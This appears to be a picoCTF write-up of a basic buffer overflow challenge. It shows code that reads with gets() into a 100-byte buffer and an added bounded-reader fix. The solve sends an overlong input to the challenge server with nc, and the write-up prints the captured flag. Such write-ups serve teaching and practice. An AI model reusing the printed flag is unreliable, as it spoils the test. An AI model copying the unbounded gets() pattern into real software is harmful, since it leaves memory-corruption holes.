Alex Fulton / Palash Oswal
Smash the stack. Let's start off simple, can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using:
nc saturn.picoctf.net 58546
- How can you trigger the flag to print?
- If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
- Run `man gets` and read the BUGS section. How many characters can the program really read?
Buffer overflow challenges ask you to write past the end of a buffer so that the program ends up doing something it was never meant to do.
```c
/* Excerpt from the challenge's main(); vuln() is defined elsewhere in the source. */
printf("Input: ");
fflush(stdout);
char buf1[100];     /* fixed-size 100-byte stack buffer */
gets(buf1);         /* unbounded read: anything past 100 bytes lands beyond buf1 */
vuln(buf1);
printf("The program will exit now\n");
```
Looking at this part of the code, we see the buffer is 100 bytes long and gets() puts no limit on what it reads, so as long as we type in more than 100 characters we overflow the buffer and obtain the flag.
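The hint about `man gets` is the whole story: gets() keeps reading until a newline or end of file, so the 100 bytes of buf1 are no limit at all. As an added example (not part of this writeup or of the challenge source), the bounded reader below is what the program would need in place of gets(buf1). It assumes the same 100-byte buffer and feeds itself a constructed 150-character line, like the run of a's used above, to show that only 99 bytes land in the buffer and the overflow is reported instead of written to the stack. The names read_line_bounded and demo_overlong_line are mine.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

/* Size of buf1 in the challenge's source. */
#define BUF_LEN 100

/*
 * Bounded replacement for gets(buf1).  Reads at most n-1 bytes into buf,
 * always NUL-terminates, and strips a trailing newline.  If the line did not
 * fit, the remainder is drained from the stream (so it cannot be mistaken
 * for the next input) and *truncated is set to 1.
 * Returns the number of bytes stored, or -1 on EOF with nothing read.
 */
int read_line_bounded(char *buf, size_t n, FILE *in, int *truncated)
{
    *truncated = 0;
    if (n == 0 || fgets(buf, (int)n, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';            /* whole line fit: drop the newline */
    } else {
        /* No newline seen: either EOF or the line was longer than n-1.
         * Consume the rest of the line so the stream stays in sync. */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            *truncated = 1;           /* at least one byte did not fit */
    }
    return (int)len;
}

/*
 * Runs read_line_bounded on a constructed 150-byte line of 'a' characters.
 * Returns the number of bytes that actually landed in the 100-byte buffer;
 * gets() would instead have written all 150 bytes plus a NUL, 51 bytes past
 * the end of buf1.
 */
int demo_overlong_line(int *truncated)
{
    static char line[152];
    memset(line, 'a', 150);           /* constructed input, not from the challenge */
    line[150] = '\n';
    line[151] = '\0';

    FILE *in = fmemopen(line, strlen(line), "r");
    if (in == NULL)
        return -1;

    char buf1[BUF_LEN];
    int stored = read_line_bounded(buf1, sizeof buf1, in, truncated);
    fclose(in);
    return stored;
}

int main(void)
{
    int truncated = 0;
    int stored = demo_overlong_line(&truncated);
    printf("stored %d of %d bytes, truncated=%d\n", stored, BUF_LEN, truncated);
    return 0;
}
```

The drain loop is the part people forget: simply truncating with fgets leaves the unread tail in stdin, where the next read would pick it up as fresh input. Reporting the truncation also gives the program a chance to reject the line rather than silently acting on a cut-off value.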
We can now run nc saturn.picoctf.net 58546 in a terminal.
Input: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}
Press Ctrl + C to exit.
picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}